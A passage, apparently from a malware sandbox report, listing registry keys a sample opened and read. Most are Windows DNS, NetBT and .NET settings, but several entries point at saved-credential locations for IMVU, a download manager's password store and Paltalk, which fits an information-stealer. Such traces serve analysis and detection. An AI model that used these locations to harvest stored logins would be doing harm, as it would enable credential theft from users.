NT\DNSClient\DnsSecureNameQueryFallback HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsSecureNameQueryFallback HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\EnableDAForAllNetworks HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\EnableDAForAllNetworks HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DirectAccessQueryOrder HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DirectAccessQueryOrder HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\QueryIpMatching HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\QueryIpMatching HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UseHostsFile HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseHostsFile HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AddrConfigControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AddrConfigControl HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationEnabled HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationEnabled HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableDynamicUpdate HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterPrimaryName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterPrimaryName HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterAdapterName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterAdapterName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\EnableAdapterDomainNameRegistration HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterReverseLookup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterReverseLookup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableReverseAddressRegistrations HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterWanAdapters HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterWanAdapters HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableWanDynamicUpdate HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationTtl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationTtl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DefaultRegistrationTTL HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationRefreshInterval HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationRefreshInterval HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DefaultRegistrationRefreshInterval HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationMaxAddressCount HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationMaxAddressCount HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\MaxNumberOfAddressesToRegister HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UpdateSecurityLevel HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UpdateSecurityLevel HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\UpdateSecurityLevel HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UpdateTopLevelDomainZones HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UpdateTopLevelDomainZones HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DowncaseSpnCauseApiOwnerIsTooLazy HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DowncaseSpnCauseApiOwnerIsTooLazy HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationOverwrite HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationOverwrite HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxCacheSize HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxCacheSize HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxCacheTtl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxCacheTtl HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxNegativeCacheTtl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxNegativeCacheTtl HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AdapterTimeoutLimit HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AdapterTimeoutLimit HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ServerPriorityTimeLimit HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ServerPriorityTimeLimit HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxCachedSockets HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxCachedSockets HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\EnableMulticast HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MulticastResponderFlags HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MulticastResponderFlags HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MulticastSenderFlags HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MulticastSenderFlags HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MulticastSenderMaxTimeout HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MulticastSenderMaxTimeout HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsTest HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseCompartments HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\CacheAllCompartments HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseNewRegistration HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ResolverRegistration HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ResolverRegistrationOnly HKEY_LOCAL_MACHINE\System\Setup HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsQueryTimeouts HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DnsQueryTimeouts HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsQuickQueryTimeouts HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DnsQuickQueryTimeouts HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\PrimaryDomainName HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\System\DNSClient HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Domain HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Hostname HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\EnableAdapterDomainNameRegistration HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AdapterDomainName HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\QueryAdapterName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\DisableAdapterDomainName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\RegistrationEnabled HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\RegisterAdapterName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\RegistrationMaxAddressCount HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\MaxNumberOfAddressesToRegister HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\Domain HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\DhcpDomain HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{846EE342-7039-11DE-9D20-806E6F6E6963} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\QueryAdapterName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\DisableAdapterDomainName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\RegistrationEnabled HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\DisableDynamicUpdate HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\RegisterAdapterName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\EnableAdapterDomainNameRegistration HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\RegistrationMaxAddressCount HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\MaxNumberOfAddressesToRegister HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\Domain HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\DhcpDomain HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\SearchList HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\SearchList HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SQMClient\Windows HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\NodeType HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\DhcpNodeType HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\ScopeId HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\DhcpScopeId HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\EnableProxy HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\NetBT\Parameters\EnableDns HKEY_CURRENT_USER\Software\IMVU\username HKEY_CURRENT_USER\Software\DownloadManager\Passwords HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5a8de2c3\2b1a4e4\47\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.8.0.Microsoft.JScript__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.JScript,8.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration.Install__b03f5f7f11d50a3a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration.Install,2.0.0.0,,b03f5f7f11d50a3a,MSIL HKEY_CURRENT_USER\Software\Paltalk HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\FinalizerActivityBypass
Read Keys
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index21 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG 